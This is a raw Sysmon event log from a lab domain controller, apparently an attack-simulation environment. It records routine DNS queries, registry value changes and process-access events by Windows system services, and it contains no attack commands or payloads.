13:53:45.341{10ACEC4A-8541-5FCF-1000-000000009101}1156isatap.eu-central-1.compute.internal9003-C:\Windows\System32\svchost.exe 22542200x80000000000000002841Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.309{10ACEC4A-8541-5FCF-1000-000000009101}1156win-dc-935.attackrange.local0fe80::3a:131:f5ff:fef1;fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002840Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.308{10ACEC4A-8541-5FCF-1500-000000009101}1364eu-central-1.compute.internal1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002839Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.307{10ACEC4A-8541-5FCF-1500-000000009101}1364axczylkuoe1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002838Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.278{10ACEC4A-8551-5FCF-2B00-000000009101}2636WIN-DC-9350fe80::3a:131:f5ff:fef1;fe80::f48a:7e9b:8cc9:e855;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002837Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.271{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002865Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:46.775{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002864Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:46.101{10ACEC4A-8541-5FCF-1500-000000009101}1364win-dc-9351460-C:\Windows\System32\svchost.exe 22542200x80000000000000002863Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.749{10ACEC4A-8541-5FCF-1200-000000009101}1212wpad9003-C:\Windows\System32\svchost.exe 22542200x80000000000000002862Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:45.748{10ACEC4A-8551-5FCF-2B00-000000009101}2636WIN-DC-9350fe80::3a:131:f5ff:fef1;2001:0:2851:782c:3a:131:f5ff:fef1;fe80::f48a:7e9b:8cc9:e855;C:\Windows\System32\spoolsv.exe 13241300x80000000000000002861Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.320{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000002860Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.320{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 13241300x80000000000000002859Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.320{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 13241300x80000000000000002858Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.320{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000002857Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.288{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000002856Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.288{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000002855Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.288{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000002854Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.288{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000002853Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.288{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000002852Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.288{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000002851Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.288{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000002850Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.288{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000002849Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.288{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000002848Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.288{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000002847Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.288{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000002846Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.288{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-935 10341000x80000000000000002845Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:48.288{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000002844Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:48.288{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 22542200x80000000000000002869Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:48.303{10ACEC4A-8541-5FCF-1500-000000009101}1364attackrange.local0type: 2 win-dc-935.attackrange.local;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002868Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:48.299{10ACEC4A-8551-5FCF-2C00-000000009101}2484win-dc-935.attackrange.local0fe80::3a:131:f5ff:fef1;2001:0:2851:782c:3a:131:f5ff:fef1;fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002867Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:48.292{10ACEC4A-8541-5FCF-1500-000000009101}1364win-dc-935.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\svchost.exe 13241300x80000000000000002866Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:49.335{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000355) 22542200x80000000000000002871Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:48.334{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.50215272-c8dc-4125-b5e0-31437a8b7ba7.domains._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002870Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:48.332{10ACEC4A-853E-5FCF-0B00-000000009101}864_ldap._tcp.dc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 10341000x80000000000000002896Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:51.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002895Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:51.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002894Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:51.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002893Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:51.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002892Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:51.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002891Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:51.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002890Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:51.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002889Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:51.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002888Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:51.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002887Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:51.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002886Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:51.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002885Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:51.335{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002884Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:51.304{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000002883Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:51.304{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000002882Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:51.304{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000002881Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:51.304{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000002880Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:51.304{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000002879Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:51.304{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000002878Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:51.304{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000002877Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:51.304{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000002876Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 